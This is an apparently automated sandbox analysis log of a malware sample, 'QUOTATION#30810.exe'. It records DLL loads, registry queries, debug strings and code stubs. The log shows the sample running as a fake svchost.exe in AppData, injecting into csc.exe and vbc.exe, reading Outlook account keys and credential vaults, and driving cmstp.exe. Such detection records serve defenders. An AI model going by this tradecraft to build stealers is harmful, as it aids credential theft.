                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winmm.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: pstorec.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vaultcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmutil.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmcfg32.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmlua.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: comsvcs.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmstplua.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmlua.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: thumbcache.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textshaping.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: pstorec.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmutil.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textshaping.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: winmm.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmutil.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textshaping.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\cmstp.exeAutomated click: OK
                        Source: C:\Windows\System32\cmstp.exeAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: QUOTATION#30810.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: QUOTATION#30810.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: QUOTATION#30810.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: svchost.PDBy# source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: mscorlib.pdbp^ source: WER5A3A.tmp.dmp.48.dr
                        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb. source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb(System.Object, System.Object[], System.Signature, Boolean) source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbOneDrive=C:\Users\user\OneDriveh source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbn source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdber source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbme.Int source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: mscorlib.pdbh source: WER1988.tmp.dmp.29.dr
                        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB0 source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb:n source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: st.PDB source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: QUOTATION#30810.exeStatic PE information: 0x9CE0EC5F [Tue May 27 19:17:51 2053 UTC]
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,26_2_0041CB50
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF9CB5A pushad ; retf 0_2_00007FFB4AF9CB79
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4AF900BD pushad ; iretd 0_2_00007FFB4AF900C1
                        Source: C:\Users\user\Desktop\QUOTATION#30810.exeCode function: 0_2_00007FFB4B07026B push esp; retf 4810h0_2_00007FFB4B070312
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF800BD pushad ; iretd 9_2_00007FFB4AF800C1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4AF8CB5A pushad ; retf 9_2_00007FFB4AF8CB79
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 9_2_00007FFB4B0601C8 push esp; retf 4810h9_2_00007FFB4B060312
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF800BD pushad ; iretd 11_2_00007FFB4AF800C1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF97B29 push cs; ret 11_2_00007FFB4AF97B3F
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4AF8CB5A pushad ; retf 11_2_00007FFB4AF8CB79
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 11_2_00007FFB4B06026B push esp; retf 4810h11_2_00007FFB4B060312
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AF900BD pushad ; iretd 16_2_00007FFB4AF900C1
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4AF9CB5A pushad ; retf 16_2_00007FFB4AF9CB79
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 16_2_00007FFB4B07026B push esp; retf 4810h16_2_00007FFB4B070312
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_10002806 push ecx; ret 20_2_10002819
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00457106 push ecx; ret 26_2_00457119
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0045B11A push esp; ret 26_2_0045B141
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0045E54D push esi; ret 26_2_0045E556
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00457A28 push eax; ret 26_2_00457A46
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00434E56 push ecx; ret 26_2_00434E69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044693D push ecx; ret 32_2_0044694D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044DB70 push eax; ret 32_2_0044DB84
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0044DB70 push eax; ret 32_2_0044DBAC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_00451D54 push eax; ret 32_2_00451D61
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0044B090 push eax; ret 37_2_0044B0A4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_0044B090 push eax; ret 37_2_0044B0CC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_00451D34 push eax; ret 37_2_00451D41
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_00444E71 push ecx; ret 37_2_00444E81
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_00414060 push eax; ret 39_2_00414074
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_00414060 push eax; ret 39_2_0041409C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_00414039 push ecx; ret 39_2_00414049
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_004164EB push 0000006Ah; retf 39_2_004165C4

                        Persistence and Installation Behavior

